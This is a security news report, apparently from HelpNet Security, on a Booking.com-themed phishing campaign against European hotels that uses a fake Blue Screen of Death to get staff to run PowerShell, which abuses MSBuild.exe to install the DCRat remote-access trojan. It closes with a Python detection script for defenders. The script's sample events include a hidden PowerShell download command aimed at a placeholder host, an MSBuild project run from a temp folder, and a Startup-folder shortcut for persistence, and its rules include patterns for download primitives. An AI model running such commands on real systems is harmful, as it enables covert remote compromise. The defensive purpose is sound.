Beware: Fake Booking.com Emails and BSODs Target Hotels

Summary
– Suspected Russian attackers are targeting the European hospitality sector with phishing emails impersonating Booking.com to deliver DCRat malware.
– The attack uses a fake “Blue Screen of Death” screen to trick users into executing a malicious PowerShell command, which then downloads and runs a harmful project file.
– The malware employs MSBuild.exe, a trusted Windows utility, to evade detection and attempts to disable Windows Defender before installing the DCRat payload.
– DCRat provides persistent remote access, logs keystrokes, and can drop additional malware, with execution ensured via a shortcut in the Startup folder.
– Researchers advise monitoring legitimate system tools for unusual activity, enabling PowerShell logging, and educating employees about this “ClickFix” social engineering technique.
A sophisticated malware campaign is targeting the European hospitality industry, using convincing fake emails from Booking.com to deliver a dangerous remote access trojan. Security researchers have identified a threat actor, suspected to be Russian in origin, that is luring hotel staff with fraudulent reservation alerts. The emails cleverly mimic legitimate booking notifications, complete with details like room charges in euros, making them highly effective at bypassing initial scrutiny. This social engineering attack ultimately deploys the DCRat malware, which can steal sensitive data and provide attackers with persistent control over infected systems.
The attack begins with a phishing email designed to look like a Booking.com reservation cancellation alert. The message includes a “See Details” button that redirects the recipient to a cloned version of the real Booking.com website. Once on this fake site, a JavaScript pop-up appears, claiming the page is loading slowly and prompting the user to click a refresh button. This action triggers the browser to enter full-screen mode, displaying a realistic but entirely fake Windows Blue Screen of Death (BSOD).
This counterfeit error screen provides “recovery instructions” that guide the victim into opening the Windows Run dialog. The user is then told to paste and execute a specific, malicious PowerShell command. While this command opens a decoy Booking.com admin page in the browser to maintain the illusion, it secretly works in the background. It downloads a harmful project file and uses the trusted Windows Microsoft Build Engine (MSBuild.exe) to compile and run it. This technique, known as “living off the land,” helps the malware evade detection by leveraging legitimate system tools.
The executed project file has a critical first task: it attempts to disable Windows Defender to prevent the security software from noticing the next stage. If the computer is running in Standard User mode, the file will repeatedly trigger User Account Control (UAC) prompts, asking for administrative privileges. Once granted, or if the machine is already in Admin mode, the final payload is delivered. The DCRat malware is downloaded and executed, and an Internet Shortcut is placed in the user’s Startup folder to ensure the infection reactivates with every login.
DCRat is a powerful and invasive tool for attackers. It provides capabilities for keylogging, stealing credentials, dropping additional malicious software, and maintaining remote access to the compromised computer. This allows threat actors to potentially steal financial information, guest data, and other sensitive material from hospitality businesses.
This campaign represents an evolution in tactics. Earlier versions used simpler methods involving HTML Application (.hta) files, which were easier for security software to catch. The shift to using MSBuild.exe demonstrates a strategic move toward more stealthy, fileless techniques that are harder to detect. The social engineering element, often called the “ClickFix” technique, has proven highly successful at tricking users into initiating the infection chain themselves.
To defend against such threats, organizations are advised to take several proactive steps. Employee education is paramount, specifically training staff to recognize sophisticated phishing attempts and fake error messages. IT teams should monitor trusted system processes like MSBuild.exe for unusual activity, such as connections to suspicious external servers. Additionally, enabling PowerShell logging and watching for the creation of unexpected files in system directories or Internet Shortcuts in Startup folders can provide early warning signs of a compromise.
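As an added example (not from the HelpNet Security article or the researchers it cites), the monitoring advice above expressed as a small Python triage rule set run over constructed Sysmon-style events: it flags a PowerShell download launched from the shell (the Run-dialog step), MSBuild.exe spawned by PowerShell or building a project from a user-writable path, and an Internet Shortcut dropped into a Startup folder. All paths, hostnames and command lines are assumed sample values, not indicators from the campaign.

```python
import re

# Constructed Sysmon-style events (not real telemetry): id 1 = process create, id 11 = file create.
# Hostnames use the reserved .invalid TLD; paths and command lines are illustrative assumptions.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": "powershell -w hidden -c \"start https://admin.example.invalid/; "
            "iwr https://cdn.example.invalid/p.xml -OutFile $env:TEMP\\p.xml\""},
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"MSBuild.exe C:\Users\frontdesk\AppData\Local\Temp\p.xml"},
    {"id": 11, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "target": r"C:\Users\frontdesk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.url"},
    # Benign developer build: MSBuild launched by Visual Studio on a project in a source tree.
    {"id": 1, "image": r"C:\Program Files\Microsoft Visual Studio\2022\MSBuild\Current\Bin\MSBuild.exe",
     "parent": r"C:\Program Files\Microsoft Visual Studio\2022\Common7\IDE\devenv.exe",
     "cmd": r"MSBuild.exe C:\src\app\app.csproj /t:Build"},
]

DOWNLOAD_PRIMITIVES = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
SHELL_PARENTS = ("explorer.exe", "cmd.exe")  # explorer.exe is the parent of a Run-dialog launch


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the list of rule names a single event triggers (empty if none)."""
    findings = []
    img = basename(ev.get("image", ""))
    if ev["id"] == 1:
        parent, cmd = basename(ev.get("parent", "")), ev.get("cmd", "")
        # Rule 1: PowerShell started from the shell with a download primitive in its command line.
        if img == "powershell.exe" and parent in SHELL_PARENTS and DOWNLOAD_PRIMITIVES.search(cmd):
            findings.append("powershell_download_from_shell")
        # Rule 2: MSBuild used as a living-off-the-land binary rather than by a build tool.
        if img == "msbuild.exe" and (parent == "powershell.exe" or USER_WRITABLE.search(cmd)):
            findings.append("msbuild_suspicious_project")
    elif ev["id"] == 11:
        # Rule 3: an Internet Shortcut (.url) written into a Startup folder for persistence.
        target = ev.get("target", "")
        if STARTUP_DIR.search(target) and target.lower().endswith(".url"):
            findings.append("startup_url_shortcut")
    return findings


def scan(events):
    """Run every rule over a list of events; returns (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]
```

Run against `SAMPLE_EVENTS`, the first three events each trigger exactly one rule in chain order, while the Visual Studio build is left alone; in production the same rules would be fed from Sysmon or PowerShell script block logs rather than the inline list.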
(Source: HelpNet Security)